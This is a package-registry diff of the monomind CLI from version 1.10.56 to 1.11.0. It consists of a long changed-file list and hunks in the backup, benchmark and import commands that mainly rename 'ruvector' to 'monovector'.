monomind 1.10.56 → 1.11.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/.claude/agents/core/coordinator.md +71 -0
- package/.claude/agents/generated/case-analyst.md +50 -0
- package/.claude/agents/generated/copy-editor.md +45 -0
- package/.claude/agents/generated/court-reporter.md +50 -0
- package/.claude/agents/generated/defender.md +51 -0
- package/.claude/agents/generated/editor-in-chief.md +45 -0
- package/.claude/agents/generated/fact-checker.md +45 -0
- package/.claude/agents/generated/judge.md +51 -0
- package/.claude/agents/generated/prosecutor.md +51 -0
- package/.claude/agents/generated/reporter.md +45 -0
- package/.claude/commands/hooks/README.md +1 -1
- package/.claude/commands/hooks/overview.md +1 -1
- package/.claude/commands/mastermind/_repeat.md +1 -1
- package/.claude/commands/mastermind/do.md +3 -1
- package/.claude/commands/mastermind/help.md +2 -2
- package/.claude/commands/mastermind/master.md +39 -6
- package/.claude/commands/mastermind/memory.md +1 -1
- package/.claude/commands/memory/memory-search.md +2 -2
- package/.claude/commands/monitoring/status.md +1 -1
- package/.claude/commands/{browse.md → monobrowse.md} +2 -2
- package/.claude/commands/sparc.md +1 -1
- package/.claude/helpers/handlers/graph-status-handler.cjs +1 -1
- package/.claude/helpers/loop-tracker.cjs +1 -1
- package/.claude/scheduled_tasks.lock +1 -1
- package/.claude/skills/agent-browser-testing/SKILL.md +1 -1
- package/.claude/skills/hooks-automation/SKILL.md +0 -3
- package/.claude/skills/mastermind/build.md +1 -1
- package/.claude/skills/mastermind/code-quality-reviewer-prompt.md +60 -0
- package/.claude/skills/mastermind/content.md +1 -1
- package/.claude/skills/mastermind/createorg.md +79 -2
- package/.claude/skills/mastermind/design.md +3 -1
- package/.claude/skills/mastermind/finance.md +1 -1
- package/.claude/skills/mastermind/implementer-prompt.md +109 -0
- package/.claude/skills/mastermind/marketing.md +1 -1
- package/.claude/skills/mastermind/ops.md +1 -1
- package/.claude/skills/mastermind/plan.md +20 -2
- package/.claude/skills/mastermind/release.md +1 -1
- package/.claude/skills/mastermind/research.md +1 -1
- package/.claude/skills/mastermind/review.md +1 -1
- package/.claude/skills/mastermind/sales.md +1 -1
- package/.claude/skills/mastermind/spec-reviewer-prompt.md +63 -0
- package/.claude/skills/sparc-methodology/SKILL.md +3 -3
- package/.claude/skills/swarm-advanced/SKILL.md +1 -4
- package/.claude-plugin/README.md +1 -2
- package/.claude-plugin/docs/PLUGIN_SUMMARY.md +0 -1
- package/README.md +18 -32
- package/package.json +1 -1
- package/packages/@monomind/cli/README.md +18 -32
- package/packages/@monomind/cli/dist/src/agents/registry-builder.d.ts +1 -7
- package/packages/@monomind/cli/dist/src/agents/registry-builder.js +10 -6
- package/packages/@monomind/cli/dist/src/benchmarks/benchmark-runner.d.ts +59 -12
- package/packages/@monomind/cli/dist/src/benchmarks/benchmark-runner.js +67 -13
- package/packages/@monomind/cli/dist/src/benchmarks/pretrain/index.d.ts +0 -13
- package/packages/@monomind/cli/dist/src/commands/agent-wasm.d.ts +2 -2
- package/packages/@monomind/cli/dist/src/commands/agent-wasm.js +5 -5
- package/packages/@monomind/cli/dist/src/commands/agent.js +1 -6
- package/packages/@monomind/cli/dist/src/commands/analyze.d.ts +1 -1
- package/packages/@monomind/cli/dist/src/commands/analyze.js +8 -18
- package/packages/@monomind/cli/dist/src/commands/doctor.js +53 -3
- package/packages/@monomind/cli/dist/src/commands/embeddings.js +9 -33
- package/packages/@monomind/cli/dist/src/commands/hooks.js +24 -76
- package/packages/@monomind/cli/dist/src/commands/index.d.ts +4 -6
- package/packages/@monomind/cli/dist/src/commands/index.js +8 -15
- package/packages/@monomind/cli/dist/src/commands/init.js +2 -2
- package/packages/@monomind/cli/dist/src/commands/issues.js +16 -11
- package/packages/@monomind/cli/dist/src/commands/mcp.d.ts +1 -1
- package/packages/@monomind/cli/dist/src/commands/memory.js +6 -6
- package/packages/@monomind/cli/dist/src/commands/migrate.js +1 -2
- package/packages/@monomind/cli/dist/src/commands/monograph.js +18 -11
- package/packages/@monomind/cli/dist/src/commands/monovector/backup.d.ts +11 -0
- package/packages/@monomind/cli/dist/src/commands/{ruvector → monovector}/backup.js +25 -25
- package/packages/@monomind/cli/dist/src/commands/monovector/benchmark.d.ts +11 -0
- package/packages/@monomind/cli/dist/src/commands/{ruvector → monovector}/benchmark.js +14 -14
- package/packages/@monomind/cli/dist/src/commands/monovector/import.d.ts +18 -0
- package/packages/@monomind/cli/dist/src/commands/{ruvector → monovector}/import.js +21 -21
- package/packages/@monomind/cli/dist/src/commands/{ruvector → monovector}/index.d.ts +6 -6
- package/packages/@monomind/cli/dist/src/commands/{ruvector → monovector}/index.js +22 -22
- package/packages/@monomind/cli/dist/src/commands/monovector/init.d.ts +11 -0
- package/packages/@monomind/cli/dist/src/commands/{ruvector → monovector}/init.js +36 -36
- package/packages/@monomind/cli/dist/src/commands/monovector/migrate.d.ts +11 -0
- package/packages/@monomind/cli/dist/src/commands/{ruvector → monovector}/migrate.js +16 -16
- package/packages/@monomind/cli/dist/src/commands/{ruvector → monovector}/optimize.d.ts +2 -2
- package/packages/@monomind/cli/dist/src/commands/{ruvector → monovector}/optimize.js +10 -10
- package/packages/@monomind/cli/dist/src/commands/monovector/setup.d.ts +18 -0
- package/packages/@monomind/cli/dist/src/commands/{ruvector → monovector}/setup.js +77 -77
- package/packages/@monomind/cli/dist/src/commands/{ruvector → monovector}/status.d.ts +2 -2
- package/packages/@monomind/cli/dist/src/commands/{ruvector → monovector}/status.js +34 -34
- package/packages/@monomind/cli/dist/src/commands/neural.d.ts +1 -1
- package/packages/@monomind/cli/dist/src/commands/neural.js +31 -608
- package/packages/@monomind/cli/dist/src/commands/performance.js +7 -10
- package/packages/@monomind/cli/dist/src/commands/plugins.js +3 -4
- package/packages/@monomind/cli/dist/src/commands/process.js +5 -12
- package/packages/@monomind/cli/dist/src/commands/progress.js +16 -16
- package/packages/@monomind/cli/dist/src/commands/route.d.ts +2 -2
- package/packages/@monomind/cli/dist/src/commands/route.js +23 -23
- package/packages/@monomind/cli/dist/src/commands/status.js +0 -3
- package/packages/@monomind/cli/dist/src/commands/swarm.js +2 -3
- package/packages/@monomind/cli/dist/src/commands/update.d.ts +1 -1
- package/packages/@monomind/cli/dist/src/config-adapter.js +27 -0
- package/packages/@monomind/cli/dist/src/consensus/audit-writer.d.ts +44 -17
- package/packages/@monomind/cli/dist/src/dlq/dlq-replayer.d.ts +1 -1
- package/packages/@monomind/cli/dist/src/index.d.ts +1 -1
- package/packages/@monomind/cli/dist/src/index.js +5 -5
- package/packages/@monomind/cli/dist/src/init/claudemd-generator.js +10 -14
- package/packages/@monomind/cli/dist/src/init/executor.js +17 -27
- package/packages/@monomind/cli/dist/src/init/helpers-generator.d.ts +1 -1
- package/packages/@monomind/cli/dist/src/init/helpers-generator.js +2 -2
- package/packages/@monomind/cli/dist/src/init/types.d.ts +1 -1
- package/packages/@monomind/cli/dist/src/mcp-client.js +1 -7
- package/packages/@monomind/cli/dist/src/mcp-server.js +9 -1
- package/packages/@monomind/cli/dist/src/mcp-tools/agent-tools.js +1 -52
- package/packages/@monomind/cli/dist/src/mcp-tools/analyze-tools.js +5 -5
- package/packages/@monomind/cli/dist/src/mcp-tools/auto-install.d.ts +4 -4
- package/packages/@monomind/cli/dist/src/mcp-tools/autopilot-tools.d.ts +1 -1
- package/packages/@monomind/cli/dist/src/mcp-tools/browser-tools.d.ts +1 -1
- package/packages/@monomind/cli/dist/src/mcp-tools/browser-tools.js +6 -5
- package/packages/@monomind/cli/dist/src/mcp-tools/claims-tools.d.ts +1 -1
- package/packages/@monomind/cli/dist/src/mcp-tools/coordination-tools.d.ts +1 -1
- package/packages/@monomind/cli/dist/src/mcp-tools/coordination-tools.js +51 -54
- package/packages/@monomind/cli/dist/src/mcp-tools/daa-tools.d.ts +1 -1
- package/packages/@monomind/cli/dist/src/mcp-tools/embeddings-tools.js +10 -10
- package/packages/@monomind/cli/dist/src/mcp-tools/guidance-tools.d.ts +1 -1
- package/packages/@monomind/cli/dist/src/mcp-tools/guidance-tools.js +0 -24
- package/packages/@monomind/cli/dist/src/mcp-tools/hooks-tools.js +189 -446
- package/packages/@monomind/cli/dist/src/mcp-tools/index.d.ts +0 -2
- package/packages/@monomind/cli/dist/src/mcp-tools/index.js +0 -2
- package/packages/@monomind/cli/dist/src/mcp-tools/monograph-compat.d.ts +334 -0
- package/packages/@monomind/cli/dist/src/mcp-tools/monograph-compat.js +1108 -0
- package/packages/@monomind/cli/dist/src/mcp-tools/monograph-tools.js +76 -34
- package/packages/@monomind/cli/dist/src/mcp-tools/neural-tools.d.ts +2 -2
- package/packages/@monomind/cli/dist/src/mcp-tools/neural-tools.js +2 -2
- package/packages/@monomind/cli/dist/src/mcp-tools/progress-tools.d.ts +1 -1
- package/packages/@monomind/cli/dist/src/mcp-tools/ruvllm-tools.d.ts +2 -2
- package/packages/@monomind/cli/dist/src/mcp-tools/ruvllm-tools.js +3 -3
- package/packages/@monomind/cli/dist/src/mcp-tools/terminal-tools.d.ts +1 -1
- package/packages/@monomind/cli/dist/src/mcp-tools/terminal-tools.js +29 -19
- package/packages/@monomind/cli/dist/src/mcp-tools/transfer-tools.d.ts +1 -1
- package/packages/@monomind/cli/dist/src/mcp-tools/wasm-agent-tools.d.ts +1 -1
- package/packages/@monomind/cli/dist/src/mcp-tools/wasm-agent-tools.js +2 -2
- package/packages/@monomind/cli/dist/src/memory/intelligence.js +14 -8
- package/packages/@monomind/cli/dist/src/memory/memory-bridge.d.ts +17 -2
- package/packages/@monomind/cli/dist/src/memory/memory-bridge.js +76 -23
- package/packages/@monomind/cli/dist/src/memory/memory-initializer.d.ts +2 -2
- package/packages/@monomind/cli/dist/src/memory/memory-initializer.js +37 -39
- package/packages/@monomind/cli/dist/src/monovector/capabilities.d.ts +34 -0
- package/packages/@monomind/cli/dist/src/monovector/capabilities.js +37 -0
- package/packages/@monomind/cli/dist/src/monovector/command-outcomes.d.ts +37 -0
- package/packages/@monomind/cli/dist/src/monovector/command-outcomes.js +87 -0
- package/packages/@monomind/cli/dist/src/monovector/coverage-router.d.ts +103 -0
- package/packages/@monomind/cli/dist/src/monovector/coverage-router.js +337 -0
- package/packages/@monomind/cli/dist/src/monovector/coverage-tools.d.ts +14 -0
- package/packages/@monomind/cli/dist/src/monovector/coverage-tools.js +112 -0
- package/packages/@monomind/cli/dist/src/{ruvector → monovector}/diff-classifier.d.ts +2 -2
- package/packages/@monomind/cli/dist/src/monovector/index.d.ts +61 -0
- package/packages/@monomind/cli/dist/src/monovector/index.js +67 -0
- package/packages/@monomind/cli/dist/src/monovector/init-state.d.ts +35 -0
- package/packages/@monomind/cli/dist/src/monovector/init-state.js +36 -0
- package/packages/@monomind/cli/dist/src/monovector/route-outcomes.d.ts +55 -0
- package/packages/@monomind/cli/dist/src/monovector/route-outcomes.js +137 -0
- package/packages/@monomind/cli/dist/src/parser.js +3 -3
- package/packages/@monomind/cli/dist/src/plugins/store/discovery.js +0 -31
- package/packages/@monomind/cli/dist/src/production/circuit-breaker.d.ts +26 -6
- package/packages/@monomind/cli/dist/src/production/error-handler.d.ts +55 -30
- package/packages/@monomind/cli/dist/src/production/index.d.ts +3 -20
- package/packages/@monomind/cli/dist/src/production/index.js +3 -15
- package/packages/@monomind/cli/dist/src/production/monitoring.d.ts +54 -34
- package/packages/@monomind/cli/dist/src/production/monitoring.js +12 -14
- package/packages/@monomind/cli/dist/src/production/rate-limiter.d.ts +64 -19
- package/packages/@monomind/cli/dist/src/production/rate-limiter.js +5 -5
- package/packages/@monomind/cli/dist/src/production/retry.js +4 -2
- package/packages/@monomind/cli/dist/src/runtime/headless.d.ts +3 -3
- package/packages/@monomind/cli/dist/src/services/claim-service.d.ts +50 -59
- package/packages/@monomind/cli/dist/src/services/claim-service.js +83 -50
- package/packages/@monomind/cli/dist/src/services/config-file-manager.js +8 -1
- package/packages/@monomind/cli/dist/src/services/worker-daemon.js +4 -0
- package/packages/@monomind/cli/dist/src/transfer/ipfs/upload.d.ts +1 -1
- package/packages/@monomind/cli/dist/src/transfer/storage/gcs.d.ts +1 -1
- package/packages/@monomind/cli/dist/src/types.d.ts +13 -0
- package/packages/@monomind/cli/dist/src/update/checker.d.ts +1 -1
- package/packages/@monomind/cli/dist/src/update/index.d.ts +1 -1
- package/packages/@monomind/cli/package.json +13 -13
- package/packages/@monomind/guidance/dist/index.d.ts +1 -1
- package/packages/@monomind/guidance/dist/index.js +1 -1
- package/packages/@monomind/guidance/package.json +1 -2
- package/scripts/build-monovector.sh +10 -0
- package/scripts/publish-monovector.sh +20 -0
- package/.claude/commands/monomind/adr.md +0 -11
- package/.claude/commands/monomind/budget.md +0 -7
- package/.claude/commands/monomind/createtask.md +0 -277
- package/.claude/commands/monomind/do.md +0 -498
- package/.claude/commands/monomind/graph-status.md +0 -7
- package/.claude/commands/monomind/help.md +0 -118
- package/.claude/commands/monomind/idea.md +0 -273
- package/.claude/commands/monomind/improve.md +0 -352
- package/.claude/commands/monomind/loops.md +0 -7
- package/.claude/commands/monomind/memory.md +0 -230
- package/.claude/commands/monomind/repeat.md +0 -257
- package/.claude/commands/monomind/review.md +0 -317
- package/.claude/commands/monomind/specialagents.md +0 -125
- package/.claude/commands/monomind/swarm.md +0 -161
- package/.claude/commands/monomind/understand.md +0 -139
- package/.claude/commands/training/README.md +0 -39
- package/.claude/commands/training/neural-patterns.md +0 -73
- package/.claude/commands/training/neural-train.md +0 -79
- package/packages/@monomind/cli/dist/src/commands/appliance-advanced.d.ts +0 -9
- package/packages/@monomind/cli/dist/src/commands/appliance-advanced.js +0 -238
- package/packages/@monomind/cli/dist/src/commands/appliance.d.ts +0 -8
- package/packages/@monomind/cli/dist/src/commands/appliance.js +0 -406
- package/packages/@monomind/cli/dist/src/commands/ruvector/backup.d.ts +0 -11
- package/packages/@monomind/cli/dist/src/commands/ruvector/benchmark.d.ts +0 -11
- package/packages/@monomind/cli/dist/src/commands/ruvector/import.d.ts +0 -18
- package/packages/@monomind/cli/dist/src/commands/ruvector/init.d.ts +0 -11
- package/packages/@monomind/cli/dist/src/commands/ruvector/migrate.d.ts +0 -11
- package/packages/@monomind/cli/dist/src/commands/ruvector/setup.d.ts +0 -18
- package/packages/@monomind/cli/dist/src/ruvector/agent-wasm.d.ts +0 -182
- package/packages/@monomind/cli/dist/src/ruvector/agent-wasm.js +0 -316
- package/packages/@monomind/cli/dist/src/ruvector/ast-analyzer.d.ts +0 -67
- package/packages/@monomind/cli/dist/src/ruvector/ast-analyzer.js +0 -277
- package/packages/@monomind/cli/dist/src/ruvector/coverage-router.d.ts +0 -160
- package/packages/@monomind/cli/dist/src/ruvector/coverage-router.js +0 -539
- package/packages/@monomind/cli/dist/src/ruvector/coverage-tools.d.ts +0 -33
- package/packages/@monomind/cli/dist/src/ruvector/coverage-tools.js +0 -157
- package/packages/@monomind/cli/dist/src/ruvector/enhanced-model-router.d.ts +0 -146
- package/packages/@monomind/cli/dist/src/ruvector/enhanced-model-router.js +0 -551
- package/packages/@monomind/cli/dist/src/ruvector/flash-attention.d.ts +0 -195
- package/packages/@monomind/cli/dist/src/ruvector/flash-attention.js +0 -643
- package/packages/@monomind/cli/dist/src/ruvector/graph-analyzer.d.ts +0 -187
- package/packages/@monomind/cli/dist/src/ruvector/graph-analyzer.js +0 -929
- package/packages/@monomind/cli/dist/src/ruvector/index.d.ts +0 -56
- package/packages/@monomind/cli/dist/src/ruvector/index.js +0 -58
- package/packages/@monomind/cli/dist/src/ruvector/lora-adapter.d.ts +0 -218
- package/packages/@monomind/cli/dist/src/ruvector/lora-adapter.js +0 -455
- package/packages/@monomind/cli/dist/src/ruvector/model-router.d.ts +0 -222
- package/packages/@monomind/cli/dist/src/ruvector/model-router.js +0 -512
- package/packages/@monomind/cli/dist/src/ruvector/moe-router.d.ts +0 -213
- package/packages/@monomind/cli/dist/src/ruvector/moe-router.js +0 -649
- package/packages/@monomind/cli/dist/src/ruvector/q-learning-router.d.ts +0 -217
- package/packages/@monomind/cli/dist/src/ruvector/q-learning-router.js +0 -712
- package/packages/@monomind/cli/dist/src/ruvector/ruvllm-wasm.d.ts +0 -179
- package/packages/@monomind/cli/dist/src/ruvector/ruvllm-wasm.js +0 -363
- package/packages/@monomind/cli/dist/src/ruvector/semantic-router.d.ts +0 -77
- package/packages/@monomind/cli/dist/src/ruvector/semantic-router.js +0 -178
- package/packages/@monomind/cli/dist/src/ruvector/vector-db.d.ts +0 -69
- package/packages/@monomind/cli/dist/src/ruvector/vector-db.js +0 -243
- package/packages/@monomind/cli/dist/src/services/ruvector-training.d.ts +0 -222
- package/packages/@monomind/cli/dist/src/services/ruvector-training.js +0 -696
- /package/packages/@monomind/cli/dist/src/{ruvector → monovector}/diff-classifier.js +0 -0
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
/**
|
|
2
|
-
* CLI
|
|
3
|
-
* Backup and restore for
|
|
2
|
+
* CLI MonoVector Backup Command
|
|
3
|
+
* Backup and restore for MonoVector PostgreSQL data
|
|
4
4
|
*/
|
|
5
5
|
import { output } from '../../output.js';
|
|
6
6
|
import { confirm, input } from '../../prompt.js';
|
|
@@ -30,11 +30,11 @@ function formatBytes(bytes) {
|
|
|
30
30
|
return parseFloat((bytes / Math.pow(k, i)).toFixed(2)) + ' ' + sizes[i];
|
|
31
31
|
}
|
|
32
32
|
/**
|
|
33
|
-
*
|
|
33
|
+
* MonoVector backup subcommand
|
|
34
34
|
*/
|
|
35
35
|
const backupSubcommand = {
|
|
36
36
|
name: 'create',
|
|
37
|
-
description: 'Create a backup of
|
|
37
|
+
description: 'Create a backup of MonoVector data',
|
|
38
38
|
options: [
|
|
39
39
|
{
|
|
40
40
|
name: 'output',
|
|
@@ -116,9 +116,9 @@ const backupSubcommand = {
|
|
|
116
116
|
},
|
|
117
117
|
],
|
|
118
118
|
examples: [
|
|
119
|
-
{ command: 'monomind
|
|
120
|
-
{ command: 'monomind
|
|
121
|
-
{ command: 'monomind
|
|
119
|
+
{ command: 'monomind monovector backup create -o backup.sql', description: 'Create SQL backup' },
|
|
120
|
+
{ command: 'monomind monovector backup create -o backup.json --format json', description: 'Create JSON backup' },
|
|
121
|
+
{ command: 'monomind monovector backup create -o backup.sql.gz --compress', description: 'Compressed backup' },
|
|
122
122
|
],
|
|
123
123
|
action: async (ctx) => {
|
|
124
124
|
const config = getConnectionConfig(ctx);
|
|
@@ -128,7 +128,7 @@ const backupSubcommand = {
|
|
|
128
128
|
const compress = ctx.flags.compress;
|
|
129
129
|
const includeIndexes = ctx.flags['include-indexes'] !== false;
|
|
130
130
|
output.writeln();
|
|
131
|
-
output.writeln(output.bold('
|
|
131
|
+
output.writeln(output.bold('MonoVector Backup'));
|
|
132
132
|
output.writeln(output.dim('='.repeat(60)));
|
|
133
133
|
output.writeln();
|
|
134
134
|
if (!config.database) {
|
|
@@ -139,7 +139,7 @@ const backupSubcommand = {
|
|
|
139
139
|
if (!outputPath && ctx.interactive) {
|
|
140
140
|
outputPath = await input({
|
|
141
141
|
message: 'Output file path:',
|
|
142
|
-
default: `
|
|
142
|
+
default: `monovector_backup_${new Date().toISOString().split('T')[0]}.${format}`,
|
|
143
143
|
validate: (v) => v.length > 0 || 'Output path is required',
|
|
144
144
|
});
|
|
145
145
|
}
|
|
@@ -252,7 +252,7 @@ const backupSubcommand = {
|
|
|
252
252
|
if (format === 'sql') {
|
|
253
253
|
// Generate SQL format
|
|
254
254
|
const lines = [];
|
|
255
|
-
lines.push(`--
|
|
255
|
+
lines.push(`-- MonoVector Backup`);
|
|
256
256
|
lines.push(`-- Generated: ${backupData.metadata.backupDate}`);
|
|
257
257
|
lines.push(`-- Database: ${config.database}`);
|
|
258
258
|
lines.push(`-- Schema: ${config.schema}`);
|
|
@@ -357,11 +357,11 @@ const backupSubcommand = {
|
|
|
357
357
|
},
|
|
358
358
|
};
|
|
359
359
|
/**
|
|
360
|
-
*
|
|
360
|
+
* MonoVector restore subcommand
|
|
361
361
|
*/
|
|
362
362
|
const restoreSubcommand = {
|
|
363
363
|
name: 'restore',
|
|
364
|
-
description: 'Restore
|
|
364
|
+
description: 'Restore MonoVector data from backup',
|
|
365
365
|
options: [
|
|
366
366
|
{
|
|
367
367
|
name: 'input',
|
|
@@ -428,9 +428,9 @@ const restoreSubcommand = {
|
|
|
428
428
|
},
|
|
429
429
|
],
|
|
430
430
|
examples: [
|
|
431
|
-
{ command: 'monomind
|
|
432
|
-
{ command: 'monomind
|
|
433
|
-
{ command: 'monomind
|
|
431
|
+
{ command: 'monomind monovector backup restore -i backup.sql', description: 'Restore from SQL backup' },
|
|
432
|
+
{ command: 'monomind monovector backup restore -i backup.json --clean', description: 'Clean restore' },
|
|
433
|
+
{ command: 'monomind monovector backup restore -i backup.sql --dry-run', description: 'Preview restore' },
|
|
434
434
|
],
|
|
435
435
|
action: async (ctx) => {
|
|
436
436
|
const config = getConnectionConfig(ctx);
|
|
@@ -438,7 +438,7 @@ const restoreSubcommand = {
|
|
|
438
438
|
const clean = ctx.flags.clean;
|
|
439
439
|
const dryRun = ctx.flags['dry-run'];
|
|
440
440
|
output.writeln();
|
|
441
|
-
output.writeln(output.bold('
|
|
441
|
+
output.writeln(output.bold('MonoVector Restore'));
|
|
442
442
|
output.writeln(output.dim('='.repeat(60)));
|
|
443
443
|
output.writeln();
|
|
444
444
|
if (!config.database) {
|
|
@@ -659,11 +659,11 @@ const restoreSubcommand = {
|
|
|
659
659
|
},
|
|
660
660
|
};
|
|
661
661
|
/**
|
|
662
|
-
*
|
|
662
|
+
* MonoVector backup main command
|
|
663
663
|
*/
|
|
664
664
|
export const backupCommand = {
|
|
665
665
|
name: 'backup',
|
|
666
|
-
description: 'Backup and restore
|
|
666
|
+
description: 'Backup and restore MonoVector data',
|
|
667
667
|
subcommands: [backupSubcommand, restoreSubcommand],
|
|
668
668
|
options: [
|
|
669
669
|
{
|
|
@@ -712,19 +712,19 @@ export const backupCommand = {
|
|
|
712
712
|
},
|
|
713
713
|
],
|
|
714
714
|
examples: [
|
|
715
|
-
{ command: 'monomind
|
|
716
|
-
{ command: 'monomind
|
|
715
|
+
{ command: 'monomind monovector backup create -o backup.sql', description: 'Create backup' },
|
|
716
|
+
{ command: 'monomind monovector backup restore -i backup.sql', description: 'Restore backup' },
|
|
717
717
|
],
|
|
718
718
|
action: async (ctx) => {
|
|
719
719
|
output.writeln();
|
|
720
|
-
output.writeln(output.bold('
|
|
720
|
+
output.writeln(output.bold('MonoVector Backup'));
|
|
721
721
|
output.writeln(output.dim('='.repeat(60)));
|
|
722
722
|
output.writeln();
|
|
723
723
|
output.printBox([
|
|
724
|
-
'
|
|
724
|
+
'MonoVector Backup provides data backup and restore capabilities:',
|
|
725
725
|
'',
|
|
726
|
-
' create Create a backup of
|
|
727
|
-
' restore Restore
|
|
726
|
+
' create Create a backup of MonoVector data',
|
|
727
|
+
' restore Restore MonoVector data from backup',
|
|
728
728
|
'',
|
|
729
729
|
'Supported formats:',
|
|
730
730
|
' SQL - PostgreSQL-compatible SQL statements',
|
|
@@ -738,7 +738,7 @@ export const backupCommand = {
|
|
|
738
738
|
' - Incremental restore',
|
|
739
739
|
].join('\n'), 'Backup Commands');
|
|
740
740
|
output.writeln();
|
|
741
|
-
output.printInfo('Run `monomind
|
|
741
|
+
output.printInfo('Run `monomind monovector backup <command> --help` for details');
|
|
742
742
|
return { success: true };
|
|
743
743
|
},
|
|
744
744
|
};
|
|
@@ -0,0 +1,11 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* CLI MonoVector Benchmark Command
|
|
3
|
+
* Performance benchmarking for MonoVector PostgreSQL Bridge
|
|
4
|
+
*/
|
|
5
|
+
import type { Command } from '../../types.js';
|
|
6
|
+
/**
|
|
7
|
+
* MonoVector benchmark command
|
|
8
|
+
*/
|
|
9
|
+
export declare const benchmarkCommand: Command;
|
|
10
|
+
export default benchmarkCommand;
|
|
11
|
+
//# sourceMappingURL=benchmark.d.ts.map
|
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
/**
|
|
2
|
-
* CLI
|
|
3
|
-
* Performance benchmarking for
|
|
2
|
+
* CLI MonoVector Benchmark Command
|
|
3
|
+
* Performance benchmarking for MonoVector PostgreSQL Bridge
|
|
4
4
|
*/
|
|
5
5
|
import { output } from '../../output.js';
|
|
6
6
|
import { confirm } from '../../prompt.js';
|
|
@@ -38,7 +38,7 @@ function percentile(sortedArr, p) {
|
|
|
38
38
|
return sortedArr[Math.max(0, index)];
|
|
39
39
|
}
|
|
40
40
|
/**
|
|
41
|
-
*
|
|
41
|
+
* MonoVector benchmark command
|
|
42
42
|
*/
|
|
43
43
|
export const benchmarkCommand = {
|
|
44
44
|
name: 'benchmark',
|
|
@@ -144,10 +144,10 @@ export const benchmarkCommand = {
|
|
|
144
144
|
},
|
|
145
145
|
],
|
|
146
146
|
examples: [
|
|
147
|
-
{ command: 'monomind
|
|
148
|
-
{ command: 'monomind
|
|
149
|
-
{ command: 'monomind
|
|
150
|
-
{ command: 'monomind
|
|
147
|
+
{ command: 'monomind monovector benchmark', description: 'Run default benchmark' },
|
|
148
|
+
{ command: 'monomind monovector benchmark --vectors 50000', description: 'Benchmark with 50k vectors' },
|
|
149
|
+
{ command: 'monomind monovector benchmark --index ivfflat', description: 'Test IVFFlat index' },
|
|
150
|
+
{ command: 'monomind monovector benchmark --dimensions 768 --metric l2', description: 'Custom dimensions and metric' },
|
|
151
151
|
],
|
|
152
152
|
action: async (ctx) => {
|
|
153
153
|
const config = getConnectionConfig(ctx);
|
|
@@ -160,7 +160,7 @@ export const benchmarkCommand = {
|
|
|
160
160
|
const batchSize = parseInt(ctx.flags['batch-size'] || '1000', 10);
|
|
161
161
|
const cleanup = ctx.flags.cleanup !== false;
|
|
162
162
|
output.writeln();
|
|
163
|
-
output.writeln(output.bold('
|
|
163
|
+
output.writeln(output.bold('MonoVector Performance Benchmark'));
|
|
164
164
|
output.writeln(output.dim('='.repeat(60)));
|
|
165
165
|
output.writeln();
|
|
166
166
|
if (!config.database) {
|
|
@@ -225,13 +225,13 @@ export const benchmarkCommand = {
|
|
|
225
225
|
});
|
|
226
226
|
await client.connect();
|
|
227
227
|
spinner.succeed('Connected to PostgreSQL');
|
|
228
|
-
// Detect vector extension type: prefer
|
|
228
|
+
// Detect vector extension type: prefer monovector, fall back to pgvector
|
|
229
229
|
let vectorTypeName = 'vector';
|
|
230
|
-
const
|
|
231
|
-
SELECT extname FROM pg_extension WHERE extname = '
|
|
230
|
+
const monovectorCheck = await client.query(`
|
|
231
|
+
SELECT extname FROM pg_extension WHERE extname = 'monovector'
|
|
232
232
|
`);
|
|
233
|
-
if (
|
|
234
|
-
vectorTypeName = '
|
|
233
|
+
if (monovectorCheck.rows.length > 0) {
|
|
234
|
+
vectorTypeName = 'monovector';
|
|
235
235
|
}
|
|
236
236
|
// Create benchmark table
|
|
237
237
|
const benchmarkTable = `${config.schema}.benchmark_${Date.now()}`;
|
|
@@ -278,7 +278,7 @@ export const benchmarkCommand = {
|
|
|
278
278
|
spinner.setText(`Creating ${indexType.toUpperCase()} index...`);
|
|
279
279
|
spinner.start();
|
|
280
280
|
const indexStart = Date.now();
|
|
281
|
-
const opsPrefix = vectorTypeName === '
|
|
281
|
+
const opsPrefix = vectorTypeName === 'monovector' ? 'monovector' : 'vector';
|
|
282
282
|
const metricOp = metric === 'cosine' ? `${opsPrefix}_cosine_ops` :
|
|
283
283
|
metric === 'l2' ? `${opsPrefix}_l2_ops` : `${opsPrefix}_ip_ops`;
|
|
284
284
|
if (indexType === 'hnsw') {
|
|
@@ -0,0 +1,18 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* CLI MonoVector Import Command
|
|
3
|
+
* Import data from sql.js/JSON memory to MonoVector PostgreSQL
|
|
4
|
+
*
|
|
5
|
+
* Usage:
|
|
6
|
+
* npx monomind monovector import --input memory-export.json
|
|
7
|
+
* npx monomind monovector import --from-memory
|
|
8
|
+
* npx monomind monovector import --input data.json --batch-size 100
|
|
9
|
+
*
|
|
10
|
+
* https://github.com/nokhodian/monomind
|
|
11
|
+
*/
|
|
12
|
+
import type { Command } from '../../types.js';
|
|
13
|
+
/**
|
|
14
|
+
* MonoVector Import command - import from sql.js/JSON to PostgreSQL
|
|
15
|
+
*/
|
|
16
|
+
export declare const importCommand: Command;
|
|
17
|
+
export default importCommand;
|
|
18
|
+
//# sourceMappingURL=import.d.ts.map
|
|
@@ -1,11 +1,11 @@
|
|
|
1
1
|
/**
|
|
2
|
-
* CLI
|
|
3
|
-
* Import data from sql.js/JSON memory to
|
|
2
|
+
* CLI MonoVector Import Command
|
|
3
|
+
* Import data from sql.js/JSON memory to MonoVector PostgreSQL
|
|
4
4
|
*
|
|
5
5
|
* Usage:
|
|
6
|
-
* npx monomind
|
|
7
|
-
* npx monomind
|
|
8
|
-
* npx monomind
|
|
6
|
+
* npx monomind monovector import --input memory-export.json
|
|
7
|
+
* npx monomind monovector import --from-memory
|
|
8
|
+
* npx monomind monovector import --input data.json --batch-size 100
|
|
9
9
|
*
|
|
10
10
|
* https://github.com/nokhodian/monomind
|
|
11
11
|
*/
|
|
@@ -13,7 +13,7 @@ import { output } from '../../output.js';
|
|
|
13
13
|
import * as fs from 'fs';
|
|
14
14
|
import * as path from 'path';
|
|
15
15
|
/**
|
|
16
|
-
* Format a
|
|
16
|
+
* Format a monovector embedding array for PostgreSQL
|
|
17
17
|
*/
|
|
18
18
|
function formatEmbedding(embedding, dimensions = 384) {
|
|
19
19
|
// Ensure correct dimensions by padding or truncating
|
|
